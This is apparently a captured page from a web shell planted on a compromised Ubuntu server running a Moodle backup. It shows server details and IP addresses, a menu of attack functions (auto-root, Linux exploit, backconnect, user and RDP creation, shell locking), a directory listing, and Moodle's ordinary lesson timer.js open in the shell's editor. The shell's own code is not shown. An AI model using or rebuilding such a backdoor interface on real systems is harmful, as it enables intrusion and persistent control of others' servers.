Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle.backup.39 /
mod /
lesson /
[ HOME SHELL ]
Name
Size
Permission
Action
backup
[ DIR ]
drwxrwxr-x
classes
[ DIR ]
drwxrwxr-x
db
[ DIR ]
drwxrwxr-x
lang
[ DIR ]
drwxrwxr-x
pagetypes
[ DIR ]
drwxrwxr-x
pix
[ DIR ]
drwxrwxr-x
tests
[ DIR ]
drwxrwxr-x
continue.php
5.5
KB
-rw-rw-r--
edit.php
2.85
KB
-rw-rw-r--
editpage.php
7.13
KB
-rw-rw-r--
editpage_form.php
1.95
KB
-rw-rw-r--
essay.php
20.57
KB
-rw-rw-r--
essay_form.php
2.36
KB
-rw-rw-r--
format.php
32.26
KB
-rw-rw-r--
grade.php
1.6
KB
-rw-rw-r--
import.php
3.82
KB
-rw-rw-r--
import_form.php
3.09
KB
-rw-rw-r--
index.php
4.27
KB
-rw-rw-r--
lesson.php
5.69
KB
-rw-rw-r--
lib.php
69.08
KB
-rw-rw-r--
locallib.php
200.75
KB
-rw-rw-r--
mediafile.php
3.78
KB
-rw-rw-r--
mod_form.php
21.6
KB
-rw-rw-r--
override_form.php
10.6
KB
-rw-rw-r--
overridedelete.php
3.27
KB
-rw-rw-r--
overrideedit.php
7.36
KB
-rw-rw-r--
overrides.php
9.82
KB
-rw-rw-r--
renderer.php
25.72
KB
-rw-rw-r--
report.php
16.65
KB
-rw-rw-r--
settings.php
8.69
KB
-rw-rw-r--
tabs.php
3.56
KB
-rw-rw-r--
timer.js
2.82
KB
-rw-rw-r--
upgrade.txt
2.11
KB
-rw-rw-r--
version.php
1.17
KB
-rw-rw-r--
view.php
10.59
KB
-rw-rw-r--
view_form.php
1.95
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : timer.js
/*///////////////////////////////////////////////////////// // This code is based off of // "Live Clock Lite" script - Version 1.0 // By Mark Plachetta (astroboy@zip.com.au) // // The original script displayed a clock. // Mark Nielsen modified it to be a countdown timer // for the lesson module in moodle. // // Below is the code that is used to call this page. // echo "<script type=\"text/javascript\">\n"; // echo "var starttime = ". $timer->starttime . ";\n"; // echo "var servertime = ". time() . ";\n"; // echo "var testlength = ". $lesson->timelimit .";\n"; // echo "document.write('<script type=\"text/javascript\" src=\"liveclock_lite.js\"><\/script>');\n"; // echo "window.onload = function () { show_clock(); }"; // echo "</script>\n"; // //////////////////////////////////////////////////////////*/ var stopclock = 0; var myclock = ''; var timeleft, hours, minutes, secs; var javatimeDate = new Date(); var javatime = javatimeDate.getTime(); javatime = Math.floor(javatime / 1000); if (typeof(clocksettings) != 'undefined') { if (clocksettings.starttime) { starttime = parseInt(clocksettings.starttime); } if (clocksettings.servertime) { servertime = parseInt(clocksettings.servertime); } if (clocksettings.testlength) { testlength = parseInt(clocksettings.testlength); } } difference = javatime - servertime; starttime = starttime + difference; /*function leave() { // feable attempt to run a script when someone leaves a timed test early, failed so far window.onunload = window.open('http://www.google.com','','toolbar=no,menubar=no,location=no,height=500,width=500'); } leave();*/ function show_clock() { currentDate = new Date(); current = currentDate.getTime(); current = Math.floor(current / 1000); var mytime = '', myclock = document.getElementById("lesson-timer"); if (current > starttime + testlength) { mytime += M.util.get_string('timeisup', 'lesson'); stopclock = 1; } else { timeleft = starttime + testlength - current; if (timeleft < 60) { myclock.className = "timeleft1"; } hours = Math.floor(timeleft / 3600); timeleft = timeleft - (hours * 3600); minutes = Math.floor(timeleft / 60); secs = timeleft - (minutes * 60); if (secs < 10) { secs = "0" + secs; } if (minutes < 10) { minutes = "0" + minutes; } mytime += hours + ":" + minutes + ":" + secs; } myclock.innerHTML = mytime; if (stopclock == 0) { setTimeout("show_clock()", 1000); } }
Close